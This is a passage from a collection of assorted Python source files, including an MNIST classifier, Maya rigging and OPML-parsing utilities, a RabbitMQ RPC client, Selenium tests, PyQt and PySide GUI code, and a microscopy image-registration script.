keras.utils.to_categorical(y_test, 10)\n model.fit(x_train, y_train, epochs=15, batch_size=64)\n\ndef confusion_matrix(model):\n (x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n x_train = np.reshape(x_train,(x_train.shape[0], 28, 28, 1)).astype('float32')/255.0\n x_test = np.reshape(x_test,(x_test.shape[0], 28, 28, 1)).astype('float32')/255.0\n classes = [0,1,2,3,4,5,6,7,8,9]\n y_pred=model.predict_classes(x_test)\n con_mat = tf.math.confusion_matrix(labels=y_test, predictions=y_pred).numpy()\n con_mat_norm = np.around(con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis], decimals=2)\n con_mat_df = pd.DataFrame(con_mat_norm,\n index = classes, \n columns = classes)\n figure = plt.figure(figsize=(8, 8))\n sns.heatmap(con_mat_df, annot=True,cmap=plt.cm.Blues)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.show()\n\np = os.path.abspath('/content/mlp_digits_28x28.h5')\nmodel = tf.keras.models.load_model(p)\n\nconfusion_matrix(model)\n\nimage_directory = \"/content/img/\"\nprRes(image_directory)\nprint()\n\nprint(\"my data\")\nimage_directory1 = \"/content/mytestimg/1/\"\nprRes(image_directory1)\n","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"519549907","text":"'''\nCreated on Feb 11, 2013\n\n@author: jamesd\n'''\nimport maya.cmds as cmds\n\ndef BD_jointsOnCurve(curveName = []):\n \"\"\"\n Create a joint at each point for the curves in the supplied list\n \"\"\"\n for nurbsCurve in curveName:\n getDegree = cmds.getAttr(nurbsCurve + '.degree')\n getSpans = cmds.getAttr(nurbsCurve + '.spans')\n numPoints = int(getDegree) + int(getSpans)\n for x in range (numPoints):\n if x < 10:\n padding = '00'\n elif x <100:\n padding = '0'\n else:\n padding = ''\n getCVLoc = cmds.xform('%s.cv[%s]' % (nurbsCurve , x), q= True, translation = True)\n cmds.joint(n = '%s_%s%s_cluster' % (nurbsCurve, padding, x), position = 
getCVLoc)","sub_path":"BDmaya/tools_rig/modules/BD_jointsOnCurve.py","file_name":"BD_jointsOnCurve.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"478465960","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport io\nimport csv\nfrom xml.etree import ElementTree\n\n\nclass PodcastListToCSV(object):\n\n def __init__(self, outputFile):\n self.writer = csv.writer(outputFile, quoting=csv.QUOTE_NONNUMERIC)\n self.group_name = \"\"\n\n def start(self, tag, attrib):\n if tag != \"outline\":\n return\n if not attrib.get(\"xmlUrl\"):\n self.group_name = attrib[\"text\"]\n else:\n self.writer.writerow((\n self.group_name,\n attrib[\"text\"],\n attrib[\"xmlUrl\"],\n attrib.get(\"htmlUrl\", \"\"),\n ))\n\n def end(self, tag):\n \"\"\"Ignore closing tags\"\"\"\n\n def data(self, data):\n \"\"\"Ignore data inside nodes\"\"\"\n\n def close(self):\n \"\"\"Nothing special to do here\"\"\"\n\n\ndef main():\n opml_filename = os.path.join(\"..\", \"podcasts.opml\")\n\n target = PodcastListToCSV(sys.stdout)\n parser = ElementTree.XMLParser(target=target)\n\n with open(opml_filename, \"rt\") as f:\n for line in f:\n parser.feed(line)\n parser.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"standard/038.xml.etree/create_custom_tree_builder/etree_podcast_csv_treebuilder.py","file_name":"etree_podcast_csv_treebuilder.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"175049436","text":"import namedenum ; reload(namedenum)\nfrom namedenum import enum\nimport numpy as np\n\ngutypes = enum('ShortGU', 'LongGU', 'Inflo', 'TrunkGU')\ngufate = enum('Proleptic','Sylleptic','Blind')\n\ndef is_sylleptic(gufate):\n return gufate == Sylleptic\n\ndef is_proleptic(gufate):\n return gufate == Proleptic\n \n\n \n\n\nsucessiontypes = [ShortGU, LongGU, Inflo]\nsuccessionmatrix = [[0.6, 0.0, 0.4],\n [0.35, 0.25, 0.4],\n [0.95, 0.05, 0]\n ]\n#from random import uniform, seed\nfrom numpy import cumsum\nfrom numpy.random import uniform\n\n\ndef realization_in_probaranges(probas):\n cumsum_probs = cumsum(probas)\n totalprob = cumsum_probs[-1]\n cumsum_probs /= totalprob\n assert abs(cumsum_probs[-1] -1) < 1e-5\n unif_realization = float( uniform(0,1) )\n i = 0\n while unif_realization >= cumsum_probs[i] : i += 1\n return i\n\ndef succession(gutype, successionmatrix = successionmatrix):\n if gutype == TrunkGU : return LongGU\n probas = successionmatrix[gutype]\n return sucessiontypes[realization_in_probaranges(probas)]\n\n\n\ndef normalize(matrix):\n def nml(a):\n s = sum(a)\n return a/s\n matrix = np.array(matrix)\n return np.array([nml(probas) for probas in matrix])\n \nlateralfates = [Blind, Proleptic, Sylleptic]\nbranchingmatrixfate = normalize([\n [0.4,0.6,0],\n [0.3,0.7,0],\n [0.4,0.6,0],\n [0.7,0.3,0],\n [0.4,0.25,0.35],\n [0.4,0.25,0.35],\n [0.35,0.2,0.45],\n [0.35,0.3,0.35],\n [0.3,0.55,0.15],\n [0.65,0.35,0]\n])\n\n\nlateraltypes = [ShortGU, LongGU, Inflo]\nbranchingmatrixtype = normalize([\n [0.5,0.5,0],\n [0.5,0.5,0],\n [0.75,0.25,0],\n [1,0,0],\n [1,0,0],\n [0.5,0.5,0],\n [0.25,0,0.75],\n [0.15,0.35,0.5],\n [0.15,0.7,0.15],\n [0.4,0.6,0]\n])\n\nbranchingmatrixtype = np.array(branchingmatrixtype)\n\ndef branching(gutype, u, branchingmatrixfate = branchingmatrixfate, branchingmatrixtype = branchingmatrixtype):\n if gutype in [ShortGU, Inflo] : return Blind, None\n i, _ = divmod(u, 
0.1)\n probafate = branchingmatrixfate[int(i)]\n fate = lateralfates[realization_in_probaranges(probafate)]\n if fate == Blind: return Blind, None\n probatype = branchingmatrixtype[int(i)]\n ptype = lateraltypes[realization_in_probaranges(probatype)]\n if fate == Sylleptic and ptype == Inflo:\n fate = Proleptic\n return fate, ptype\n\nfrom matplotlib.pyplot import *\ndef plot_matrix(matrix, labels):\n imshow(matrix, cmap='jet', vmin = 0, vmax = 1)\n xticks(range(len(labels)),map(str,labels),rotation=90)\n nb = len(matrix)\n yticks(range(nb),map(str,[0.1*i for i in range(nb)]))\n for i in xrange(len(labels)):\n for j in xrange(nb):\n text(i-0.5,j,str(matrix[j][i]), color='w')\n show()\n \n\n\ndef probalong(u,maxrank = 0.5, probamax = 0.5, rankspan = 0.5):\n if maxrank < 0: maxrank = 0\n elif maxrank >=1 : maxrank = 0.9\n if rankspan > 0.5 : rankspan = 0.5\n elif rankspan < 0 : rankspan = 0\n \n minu = maxrank-rankspan\n maxu = maxrank+rankspan\n if minu < -0.1:\n maxu = maxu-minu\n minu = -0.1\n if maxu > 1:\n minu -= (maxu-1)\n maxu = 1\n \n if u < minu or u > maxu:\n return 0\n if u < maxrank:\n return probamax*(u-minu)/(maxrank-minu)\n else:\n return probamax*(maxu-u)/(maxu-maxrank)\n \n\n\ndef estimatebranchingmatrixtype(maxrank = 0.5, probamax = 0.5, rankspan = 0.5):\n longs = [probalong(u, maxrank, probamax, rankspan) for u in np.arange(0,1,0.1)]\n shorts = branchingmatrixtype[:,0]\n inflos = branchingmatrixtype[:,2]\n def normalizeprobas(a,b,c):\n f = (1-b)/(a+c)\n ap = a*f\n cp = c*f\n return (ap,b,cp)\n matrix = [normalizeprobas(a,b,c) for a,b,c in zip(shorts,longs, inflos)]\n return matrix\n \n \n \n\n\n\n\n\n\n","sub_path":"appletree/appletree_architecture.py","file_name":"appletree_architecture.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22619164","text":"#!/usr/bin/env python3\n\nimport pika\nimport uuid\n\n\nclass FibonacciRPCClient(object):\n def __init__(self):\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(host=\"localhost\")\n )\n self.channel = self.connection.channel()\n\n result = self.channel.queue_declare(queue=\"\", exclusive=True)\n self.callback_queue = result.method.queue\n\n self.channel.basic_consume(\n queue=self.callback_queue,\n on_message_callback=self.on_response,\n auto_ack=True,\n )\n\n def on_response(self, channel, method, props, body):\n if self.id == props.correlation_id:\n self.response = body\n\n def exec(self, number):\n self.response = None\n self.id = str(uuid.uuid4())\n self.channel.basic_publish(\n exchange=\"\",\n routing_key=\"rpc_method\",\n properties=pika.BasicProperties(\n reply_to=self.callback_queue, correlation_id=self.id\n ),\n body=str(number),\n )\n\n while self.response is None:\n self.connection.process_data_events()\n\n return int(self.response)\n\n\nclient = FibonacciRPCClient()\n\nprint(\"client started\")\n\nnumber = input(\"type a number: \")\n\nresponse = client.exec(number)\n\nprint(f\"result: {response}\")\n","sub_path":"rabbitmq/example6/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408931130","text":"import random, os, re\nfrom sklearn.externals import 
joblib\n\nDIP_NUM=4\nBASE_HASH=16\nDYNAMIC_HASH=16\n\nquota_arr=[40,60,40,60]\nclf0=joblib.load(\"ridge40_cpu\")#40\nclf1=joblib.load(\"ridge60_cpu\")#60\nclfs={40:clf0,60:clf1}\n\nBASE=[0,0,1,1,1,2,2,3,3,3,0,1,1,2,3,3]\n\ndef cpu_ans(k):\n    with open(\"temp_cpu%s\"%(k,),\"r\") as f:\n        data=f.read()\n    p=re.compile(r\"[0-9]+.[0-9]+%\")\n    m=p.findall(data)\n    res1=[float(m[2*i][:-2]) for i in range(len(m)//2)]\n    quota=quota_arr[k-1]\n    return sum(res1)/len(res1)/quota\n\ndef calculate_weight(levels):\n    s=float(sum(levels))\n    return map(lambda level: level/s ,levels)\n\ndef calculate_args(weights):\n    temp=list(map(lambda x: int(x*DYNAMIC_HASH+0.5),weights))\n    print(temp)\n    if(sum(temp)-DYNAMIC_HASH>0):\n        for i in range(sum(temp)-DYNAMIC_HASH):\n            temp[temp.index(max(temp))]-=1\n    if(sum(temp)-DYNAMIC_HASH<0):\n        for i in range(DYNAMIC_HASH-sum(temp)):\n            temp[temp.index(min(temp))]+=1\n    print(temp)\n    assert(sum(temp)==DYNAMIC_HASH)\n    res=[]\n    for i in range(len(temp)):\n        for j in range(temp[i]):\n            res.append(i)\n    assert(len(res)==DYNAMIC_HASH)\n    res.extend(BASE)\n    assert(len(res)==DYNAMIC_HASH+BASE_HASH)\n    return res\n\ndef get_pkts():\n    p=re.compile(\"packets=[0-9]+\")\n    a=os.popen(\"/home/wsb/bmv2/targets/simple_switch/sswitch_CLI LBswitch.json < pkt_commands\")\n    m=p.findall(a.read())\n    return m\n\ndef get_indata():\n    pkts=get_pkts()\n    indata=[cpu_ans(i+1) for i in range(DIP_NUM)]\n    return indata\n\ndef norm(indata):\n    indata=list(map(lambda x: x<0.4 and 0.4 or x,indata))\n    indata=list(map(lambda x: x>0.8 and 0.8 or x,indata))\n    return indata\n\ndef get_args(first):\n    if first :\n        indata=get_indata()\n        print(indata)\n        indata=norm(indata)\n        indata=list(map(lambda x: [float(x),19],indata))\n        print(indata)\n        levels=[10/clfs[quota_arr[i]].predict(indata[i]).take(0) for i in range(DIP_NUM-1)]+[30]\n        print(levels)\n    else :\n        levels=quota_arr\n    weights=calculate_weight(levels)\n    return calculate_args(weights)\n\nif __name__ == \"__main__\":\n    indata=range(1,50)\n    print([clfs[60].predict(indata[i]).take(0) for i in range(len(indata))])\n","sub_path":"test/weight_cpu.py","file_name":"weight_cpu.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"311920135","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/12/29 0029 11:40 AM\n# @Author : zhengcx\n# @File : test_hogwarts.py\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom time import sleep\n\n\nclass TestHogwarts:\n\n    def setup_method(self):\n        browser = os.getenv(\"browser\", \"\").lower()\n        if browser == \"headless\":\n            self.driver = webdriver.PhantomJS()\n        elif browser == \"firefox\":\n            self.driver = webdriver.Firefox()\n        else:\n            options = webdriver.ChromeOptions()\n            # use headless mode (no visible browser window)\n            #options.add_argument(\"--headless\")\n            #options.add_argument(\"--disable-gpu\")\n            #options.add_argument(\"--window-size=1280,1696\")\n\n            # reuse an already-running Chrome process\n            # /Applications/Google\\ Chrome.app/Contents/MacOS/Google\\ Chrome --remote-debugging-port=9222\n            #options.debugger_address = \"127.0.0.1:9222\"\n            self.driver = webdriver.Chrome(options=options)\n\n        self.driver.get(\"https://testerhome.com/\")\n        self.driver.implicitly_wait(5)\n        #self.wait = WebDriverWait(self.driver, 10)\n\n    def wait(self, timeout, method):\n        WebDriverWait(self.driver, timeout).until(method)\n\n    def 
test_hogwarts(self):\n        self.driver.find_element(By.LINK_TEXT, '社团').click()\n        # sleep(1)\n        # explicit wait\n        # prefer CSS locator strategies; link-text locators can throw when the element is re-parsed\n        element = (By.PARTIAL_LINK_TEXT, '霍格沃兹测试学院')\n        self.wait(10, expected_conditions.element_to_be_clickable(element))\n        self.driver.find_element(*element).click()\n        # self.driver.find_element(By.CSS_SELECTOR, '[data-name=\"霍格沃兹测试学院\"]').click()\n        # CSS selectors are more reliable than link text here\n        # implicit wait\n        # self.driver.find_element(By.CSS_SELECTOR, 'topic-21848 .title > a').click()\n        self.driver.find_element(By.CSS_SELECTOR, '.topic:nth-child(1) .title a').click()\n\n    def test_jinshuju(self):\n        self.driver.get(\"https://testerhome.com/topics/21495\")\n        submit = (By.CSS_SELECTOR, \".published-form_submit\")\n\n        self.driver.switch_to.frame(0)\n        self.wait(10, expected_conditions.element_to_be_clickable(submit))\n        self.driver.find_element(By.CSS_SELECTOR, \".published-form_submit\").click()\n\n    def test_mtsc2020(self):\n        self.driver.get(\"https://testerhome.com/topics/21805\")\n        self.driver.find_element(By.PARTIAL_LINK_TEXT, \"第六届中国互联网测试开发大会\").click()\n        print(self.driver.window_handles)\n        self.wait(10, lambda x: len(self.driver.window_handles) > 1)\n        self.driver.switch_to.window(self.driver.window_handles[1])\n\n        element = (By.LINK_TEXT, '演讲申请')\n        self.wait(10, expected_conditions.visibility_of_element_located(element))\n        self.driver.find_element(*element).click()\n\n    def test_js(self):\n        for code in [\n            \"return document.title\",\n            'return document.querySelector(\".active\").className',\n            'return JSON.stringify(performance.timing)'\n        ]:\n            result = self.driver.execute_script(code)\n            print(result)\n\n    def teardown_method(self):\n        self.driver.quit()\n","sub_path":"hogwarts/selenium/test_hogwarts.py","file_name":"test_hogwarts.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"135607734","text":"import sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\nclass ClipBoard(QDialog):\n    def __init__(self):\n        super(ClipBoard, self).__init__()\n        textCopyButton=QPushButton(\"复制文本\")\n        textPasteButton=QPushButton(\"粘贴文本\")\n        htmlCopyBtn=QPushButton(\"复制Html\")\n        htmlPasteBtn=QPushButton('粘贴HTML')\n\n        imageCopyBtn=QPushButton(\"复制图像\")\n        imagePasteBtn=QPushButton(\"粘贴图像\")\n        self.textLabel=QLabel(\"默认文本\")\n        self.imageLabel=QLabel()\n        self.imageLabel.setPixmap(QPixmap('./images/1.jpg'))\n        layout=QGridLayout()\n        layout.addWidget(self.textLabel,0,0,1,2)\n        layout.addWidget(textCopyButton,1,0,1,1)\n        layout.addWidget(textPasteButton,1,1,1,1)\n        layout.addWidget(self.imageLabel,2,0,1,2)\n        layout.addWidget(imageCopyBtn,3,0,1,1)\n        layout.addWidget(imagePasteBtn,3,1,1,1)\n        self.setLayout(layout)\n        textCopyButton.clicked.connect(self.copyText)\n        textPasteButton.clicked.connect(self.pasteText)\n        imageCopyBtn.clicked.connect(self.copyImg)\n        imagePasteBtn.clicked.connect(self.pasteImg)\n        self.setWindowTitle(\"剪贴板演示\")\n    def copyText(self):\n        clipBoard = QApplication.clipboard()\n        clipBoard.setText(self.textLabel.text())\n    def pasteText(self):\n        clipBoard = QApplication.clipboard()\n        self.textLabel.setText(clipBoard.text())\n    def copyImg(self):\n        clipBoard = QApplication.clipboard()\n        clipBoard.setPixmap(self.imageLabel.pixmap())\n    def pasteImg(self):\n        clipBoard = QApplication.clipboard()\n        self.imageLabel.setPixmap(clipBoard.pixmap())\n\n\n\n\nif __name__ == '__main__':\n    app=QApplication(sys.argv)\n    main=ClipBoard()\n    main.show()\n    
sys.exit(main.exec_())\n","sub_path":"drapclip/ClipBoard.py","file_name":"ClipBoard.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"613599111","text":"#!/usr/bin/env python\n\n\"\"\"\nGet the registration offsets for a directory of images relative to a \ndirectory of CPseq files.\n\nNote: Python 3\n\nInputs:\n    directory of images to register\n    directory of CPseq files from which to pick clusters\n    \n\nOutputs:\n    registration offsets\n\nBen Ober-Reynolds\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nimport re\nimport uuid\nimport subprocess\nimport time\nfrom collections import OrderedDict\nfrom joblib import Parallel, delayed\n\n\n##### Global vars #####\noffset_scale_x = -3.7\noffset_scale_y = 3.7\n\n\ndef main(): \n    # set up command line argument parser\n    parser = argparse.ArgumentParser(description='script for getting registration offsets \\\n        for a directory of images, based on a set of CPseq files')\n    group = parser.add_argument_group('required arguments:')\n    group.add_argument('-id', '--image_directory', required=True,\n        help='directory containing images to register')\n    group.add_argument('-sd', '--CPseq_dir', required=True,\n        help='directory containing CPseq files')\n    group.add_argument('-gv','--global_vars_path', required=True, \n        help='path to the directory in which the \"GlobalVars.m\" parameter file \\\n        for the run can be found')\n    group = parser.add_argument_group('optional arguments')\n    group.add_argument('--nofile', action='store_true',\n        help='use flag to prevent output of offsets file. Results printed to STDOUT only.')\n    group.add_argument('-f', '--filters', type=str, nargs='+',\n        help='Which filter(s) from the CPseq files to register. Default is \"FIDUCIAL\"')\n    group.add_argument('-ds', '--data_scaling', type=str, default='MiSeq_to_TIRFStation1',\n        help='Data scaling for registration. Default is \"MiSeq_to_TIRFStation1\"')\n    group.add_argument('-od', '--output_directory',\n        help='output directory for registration offsets (default is original \\\n        image_directory)')\n    group.add_argument('-op', '--output_prefix', type=str, default='registration_offsets',\n        help='output prefix for registration offsets file (default is \"registration_offsets\")')\n    group.add_argument('-n', '--num_cores', type=int, default=18,\n        help='number of cores to use (should be same as number of image \\\n        files)')\n\n    # print help if no arguments provided\n    if len(sys.argv) <= 1:\n        parser.print_help()\n        sys.exit()\n\n    # parse command line arguments\n    args = parser.parse_args()\n    numCores = args.num_cores\n\n    # Pre-defined variables, constants, and settings\n    image_extension = 'tif'\n    CPseq_extension = 'CPseq'\n\n    # Check directories and output files\n    image_dir = args.image_directory\n    if not os.path.isdir(image_dir):\n        print(\"Error: invalid image directory selection. Exiting...\")\n        sys.exit()\n\n    CPseq_dir = args.CPseq_dir\n    if not os.path.isdir(CPseq_dir):\n        print(\"Error: invalid CPseq directory selection. Exiting...\")\n        sys.exit()\n\n    output_dir = args.output_directory\n    if not output_dir:\n        output_dir = image_dir\n\n    # Check global vars:\n    globalVarsFilename = os.path.join(args.global_vars_path, 'GlobalVars.m')\n    if not os.path.isfile(globalVarsFilename):\n        print('ERROR: GlobalVars.m file not found in directory \"' + args.global_vars_path + '\". 
Aborting')\n sys.exit()\n\n # Gather image files:\n print(\"Finding image files in directory {}\".format(image_dir))\n image_list = find_files_in_directory(image_dir, \n extensionList=[image_extension])\n\n # Gather CPseq files:\n print(\"Finding CPseq files in directory {}\".format(CPseq_dir))\n CPseq_list = find_files_in_directory(CPseq_dir, \n extensionList=[CPseq_extension])\n\n # Make tile dict of each tile list\n image_tile_dict = make_tile_dict(image_list)\n CPseq_tile_dict = make_tile_dict(CPseq_list)\n\n\n # Pick filters to use\n filter_list = args.filters\n if not filter_list:\n filter_list = ['FIDUCIAL']\n print(\"Registering images using the following filter(s): {}\".format(filter_list))\n\n # Run registration\n\n registration_results = []\n if numCores > 1:\n print(\"Getting registration offsets for {} image files on {} cores...\".format(\n len(image_list), numCores))\n registration_results = (Parallel(n_jobs=numCores, verbose=10)\\\n (delayed(checkRegistrationOffset)(\n tile, image_tile_dict[tile], CPseq_tile_dict[tile], args.data_scaling, \n filter_list, args.global_vars_path) for tile in image_tile_dict.keys()))\n else:\n print(\"Getting registration offsets for {} image files on one core...\".format(\n len(image_list)))\n registration_results = [checkRegistrationOffset(\n tile, image_tile_dict[tile], CPseq_tile_dict[tile], args.data_scaling, \n filter_list, args.global_vars_path) for tile in image_tile_dict.keys()]\n\n # Format and output results:\n\n # First sort by tile number:\n registration_results.sort(key=lambda x: x[0])\n\n # Save a file if indicated\n if not args.nofile:\n with open(output_dir + '/' + args.output_prefix + '.txt', 'w') as f:\n f.write('x\\ty\\n')\n for offset in registration_results:\n f.write(\"{}\\t{}\\n\".format(round(offset_scale_x*offset[2], 3), round(offset_scale_y*offset[1], 3)))\n # Add zeros at the end of this file, since the imaging stating expects 19 tiles\n f.write(\"0\\t0\")\n # print to stdout:\n print(\"Found offsets:\")\n print(\"\\tx\\ty\")\n for offset in registration_results:\n print(\"tile {}:\\t{}\\t{}\".format(offset[0], round(offset_scale_x*offset[2], 3), round(offset_scale_y*offset[1], 3)))\n\n\n\ndef find_files_in_directory(dirPath, extensionList=None, \n excludedExtensionList=None):\n \"\"\"\n Locate files in a given directory path. 
Optionally, desired files are \n identified as matching one of the extension types provided in \n 'extensionList'\n Input: \n dirPath (str) - path to directory\n extensionList (list) - list of acceptable extensions\n excludedExtensionList (list) - list of unacceptable extensions\n Output: \n fileList (list) - list of found files (with path)\n \"\"\"\n def extension_match(filename, extensionList=None):\n # from CPlibs\n if extensionList is not None:\n for currExt in extensionList:\n if filename.lower().endswith(currExt.lower()):\n return True\n return False\n\n dirList = os.listdir(dirPath)\n fileList = []\n for currFilename in dirList:\n if (extension_match(currFilename, extensionList) \n and not extension_match(currFilename, excludedExtensionList)): \n fileList.append(dirPath+currFilename)\n if len(dirList) == 0:\n print('\\tNONE FOUND')\n else:\n for filename in fileList:\n print(\"found:\\t\\t{}\".format(filename))\n return fileList\n\n\ndef get_tile_number_from_filename(inFilename):\n \"\"\"\n Extract the tile number from a provided filename based on the presence of\n 'tile###'\n Input: filename (string)\n Output: three digit tile number (string)\n \"\"\"\n # from CPlibs\n (path,filename) = os.path.split(inFilename) #split the file into parts\n (root,ext) = os.path.splitext(filename)\n matches = re.findall('tile[0-9]{1,3}',root.lower())\n tileNumber = ''\n if matches != []:\n tileNumber = '{:03}'.format(int(matches[-1][4:]))\n return tileNumber\n\n\ndef make_tile_dict(fileList):\n \"\"\"\n Make a dictionary of files keyed by tile number. \n Input: list of files containing tile numbers\n Output: dictionary of file names keyed by tile number\n \"\"\"\n fileDict = {}\n for f in fileList:\n tile = get_tile_number_from_filename(f)\n if tile == '':\n print(\"Error: no tile number in file: \"+ f)\n sys.exit()\n else:\n if tile in fileDict:\n print(\"Error: multiple files per tile\")\n sys.exit()\n fileDict[tile] = f\n return fileDict\n\n\ndef checkRegistrationOffset(tile, image_file, CPseq_file, data_scaling, filter_list, global_vars_path):\n \"\"\"\n Run the matlab script 'checkTileRegistration.m'\n Return the raw offsets calculated.\n \"\"\"\n filter_string = \"{{{}}}\".format(\",\".join(\"'\" + x + \"'\" for x in filter_list))\n\n matlabFunctionCallString = \"checkTileRegistrationV2('{0}','{1}','{2}', {3});\".format(\n CPseq_file, image_file, data_scaling, filter_string)\n\n logstring = spawnMatlabJob(matlabFunctionCallString, global_vars_path)\n # Parse logstring for relevant information:\n center_pos_offsets = \"\"\n log_lines = logstring.split('\\n')\n parens_pat = re.compile((\"\\(.+?\\,.+?\\)\"))\n\n for line in log_lines:\n matches = re.findall(parens_pat, line)\n if matches:\n center_pos_offsets = matches[1]\n\n if center_pos_offsets == \"\":\n # If registration not found, just return zeros.\n return (int(tile), 0, 0)\n offset_y, offset_x = [float(x) for x in center_pos_offsets[1:-1].split(',')]\n\n return (int(tile), offset_y, offset_x)\n\n\n\ndef spawnMatlabJob(matlabFunctionCallString,globalVarsPath):\n \"\"\"\n Adapted from CPlibs.py \n\n \"\"\"\n try:\n #construct the command-line matlab call \n functionCallString = \"try,\"\n functionCallString = functionCallString + \"addpath('{0}');\".format(globalVarsPath) #placeholder TEMP DEBUG CHANGE\n functionCallString = functionCallString + matlabFunctionCallString + ';'\n functionCallString = functionCallString + \"catch e,\"\n functionCallString = functionCallString + \"disp(getReport(e,'extended'));\"\n functionCallString = 
functionCallString + \"end,\"\n functionCallString = functionCallString + \"quit;\"\n \n logFilename = 'matlabProcess_' + str(uuid.uuid4()) + str(time.time()) + '.tempLog' #timestamped logfile filename\n \n cmdString ='matlab -nodesktop -nosplash -singleCompThread -r \"{0}\"'.format(functionCallString)\n cmdString = cmdString + ' 1>> {0}'.format(logFilename)\n cmdString = cmdString + ' 2>> {0}'.format(logFilename)\n \n print('issuing subprocess shell command: ' + cmdString)\n \n returnCode = subprocess.call(cmdString,shell=True) #execute the command in the shell\n #returnCode2 = subprocess.call('stty sane',shell=True) #matlab messes up the terminal in a weird way--this fixes it \n \n #read log file into a string\n try:\n with open(logFilename) as logFilehandle:\n logString = logFilehandle.read()\n # delete logfile\n try:\n os.unlink(logFilename)\n except OSError:\n pass\n except IOError:\n logString = 'Log file not generated for command \"' + functionCallString + '\".'\n \n # return log\n return logString\n except Exception as e:\n return 'Python exception generated in spawnMatlabJob: ' + e\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ARRAY_TOOLS_SCRIPTS/array_data_processing/getRegistrationOffsets.py","file_name":"getRegistrationOffsets.py","file_ext":"py","file_size_in_byte":11096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408584936","text":"from PySide import QtCore\nfrom PySide import QtGui\n\n\nimport libmgr\nfrom libmgr import (Session)\n\nimport taglibrary\nimport mainwindow\n\nclass TagFilterModel(QtGui.QSortFilterProxyModel):\n\n def __init__(self, parent):\n QtGui.QSortFilterProxyModel.__init__(self, parent)\n\n self.session = Session()\n self.tagName = \"\"\n\n self._setup()\n\n def filterAcceptsRow(self, sourceRow, sourceParent):\n if sourceRow < len(self.sourceModel().tags):\n if sourceRow == 0: return True\n tagName = self.sourceModel().data(self.sourceModel().index(sourceRow, 0))\n if tagName == self.tagName:\n return True\n return False\n\n def setFilterTag(self, tagName):\n self.tagName = tagName.upper()\n self.invalidateFilter()\n self.sourceModel().headerDataChanged.emit(QtCore.Qt.Horizontal, 0, 0)\n\n def lessThan(self, left, right):\n leftValue = self.sourceModel().data(left)\n rightValue = self.sourceModel().data(right)\n if leftValue == \"All\":\n return True\n elif rightValue == \"All\":\n return False\n left = self.sourceModel().index(left.row(), 1)\n right = self.sourceModel().index(right.row(), 1)\n return QtGui.QSortFilterProxyModel.lessThan(self, left, right)\n\n def _setup(self):\n self.setDynamicSortFilter(True)\n self.setSortCaseSensitivity(QtCore.Qt.CaseInsensitive)\n self.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)\n\n\nclass TagBrowser(QtGui.QTableView):\n def __init__(self, mainWindow):\n QtGui.QTableView.__init__(self, mainWindow)\n self.session = Session()\n\n self.mainWindow = mainWindow\n self.library = taglibrary.TagLibrary(self)\n self.mainFilter = TagFilterModel(self)\n\n self._setup()\n self._createContextMenus()\n\n self.selectRow(0)\n\n def _connectSigals(self):\n self.mainWindow.ui.renameTagsAction.triggered.connect(self.renameTags)\n self.mainWindow.ui.deleteTagsAction.triggered.connect(self.deleteTags)\n\n def _createContextMenus(self):\n self.tagBrowserContextMenu = QtGui.QMenu(self)\n self.tagBrowserContextMenu.addAction(self.mainWindow.ui.renameTagsAction)\n self.tagBrowserContextMenu.addAction(self.mainWindow.ui.deleteTagsAction)\n\n 
@QtCore.Slot(QtCore.QPoint)\n def showContextMenu(point):\n self.tagBrowserContextMenu.exec_(self.mapToGlobal(point))\n\n self.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.customContextMenuRequested.connect(showContextMenu)\n\n def deleteTags(self):\n for tag in self.getCurrentSelection():\n tag.delete()\n\n def getCurrentSelection(self):\n return [self.library.tags.keyAt(self.mainFilter.mapToSource(index).row())\n for index in self.selectedIndexes()]\n\n def renameTags(self):\n dialog = mainwindow.renameTagsDialog()\n\n if not dialog.exec_(): return\n\n newValue = dialog.ui.tagValueInput.text()\n tag = libmgr.getTag(self.mainFilter.tagName, newValue)\n\n for oldTag in self.getCurrentSelection():\n tag.merge(oldTag)\n\n def resetFilter(self):\n self.mainFilter.invalidateFilter()\n self.mainFilter.sort(0)\n\n def _setup(self):\n self.mainFilter.setSourceModel(self.library)\n self.setModel(self.mainFilter)\n self.setShowGrid(False)\n self.hideColumn(0)\n self.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)\n\n self.horizontalHeader().setStretchLastSection(True)\n self.library.dataChanged.connect(self.resetFilter)\n 